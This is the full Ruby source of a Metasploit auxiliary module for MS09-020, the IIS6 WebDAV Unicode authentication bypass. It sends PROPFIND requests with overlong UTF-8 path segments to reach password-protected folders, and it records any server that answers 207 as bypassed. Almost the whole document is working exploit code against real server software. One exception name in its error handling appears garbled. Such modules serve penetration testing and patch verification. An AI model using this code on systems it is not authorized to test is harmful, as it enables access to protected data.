MS09-020 IIS6 WebDAV Unicode Authentication Bypass

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpClient  
include Msf::Auxiliary::WmapScanDir  
include Msf::Auxiliary::Scanner  
include Msf::Auxiliary::Report  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'MS09-020 IIS6 WebDAV Unicode Authentication Bypass',  
'Description' => %q{  
This module attempts to to bypass authentication using the WebDAV IIS6  
Unicode vulnerability discovered by Kingcope. The vulnerability appears  
to be exploitable where WebDAV is enabled on the IIS6 server, and any  
protected folder requires either Basic, Digest or NTLM authentication.  
},  
'Author' => [ 'et', 'aushack' ],  
'License' => MSF_LICENSE,  
'References' =>  
[  
[ 'MSB', 'MS09-020' ],  
[ 'CVE', '2009-1535' ],  
[ 'CVE', '2009-1122' ],  
[ 'OSVDB', '54555' ],  
[ 'BID', '34993' ],  
]  
))  
  
register_options(  
[  
OptString.new('PATH', [ true, "The path to protected folder", '/'])  
])  
  
end  
  
def run_host(ip)  
tpath = normalize_uri(datastore['PATH'])  
if tpath[-1,1] != '/'  
tpath += '/'  
end  
  
vhost = datastore['VHOST'] || wmap_target_host  
prot = datastore['SSL'] ? 'https' : 'http'  
  
webdav_req = '<?xml version="1.0" encoding="utf-8"?><propfind xmlns="DAV:"><prop><getcontentlength xmlns="DAV:"/>' +  
'<getlastmodified xmlns="DAV:"/><executable xmlns="http://apache.org/dav/props/"/><resourcetype xmlns="DAV:"/>' +  
'<checked-in xmlns="DAV:"/><checked-out xmlns="DAV:"/></prop></propfind>'  
  
begin  
res = send_request_cgi({  
'uri' => tpath,  
'method' => 'PROPFIND',  
'ctype' => 'application/xml',  
'headers' =>  
{  
},  
'data' => webdav_req + "\r\n\r\n",  
}, 20)  
  
if(not res)  
print_error("NO Response.")  
elsif (res.code.to_i == 401)  
print_status("#{rhost}:#{rport} Confirmed protected folder #{wmap_base_url}#{tpath} #{res.code} (#{wmap_target_host})")  
print_status("#{rhost}:#{rport} \tTesting for unicode bypass in IIS6 with WebDAV enabled using PROPFIND request.")  
  
cset = %W{ & ^ % $ # @ ! }  
buff = ''  
blen = rand(16)+1  
while(buff.length < blen)  
buff << cset[ rand(cset.length) ]  
end  
bogus = Rex::Text.uri_encode(Rex::Text.to_unicode( buff, 'utf-8', 'overlong', 2))  
  
res = send_request_cgi({  
'uri' => tpath + bogus+'/',  
'method' => 'PROPFIND',  
'ctype' => 'application/xml',  
'headers' =>  
{  
#'Translate' => 'f', # Not required in PROPFIND, only GET - aushack 20091518  
},  
'data' => webdav_req + "\r\n\r\n",  
}, 20)  
  
if (res.code.to_i == 207)  
print_good("#{rhost}:#{rport} \tFound vulnerable WebDAV Unicode bypass. #{wmap_base_url}#{tpath}#{bogus}/ #{res.code} (#{wmap_target_host})")  
  
  
report_vuln(  
{  
:host => ip,  
:port => rport,  
:proto => 'tcp',  
:sname => ssl ? 'https' : 'http',  
:name => self.name,  
:info => "Module #{self.fullname} bypassed authentication with #{tpath}#{bogus} (response code #{res.code})",  
:refs => self.references,  
:exploited_at => Time.now.utc  
}  
)  
  
end  
else  
print_error("#{rhost}:#{rport} Folder does not require authentication. [#{res.code}]")  
end  
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout  
rescue ::Timeout::Error, ::Errno::E877PIPE  
end  
end  
end  
`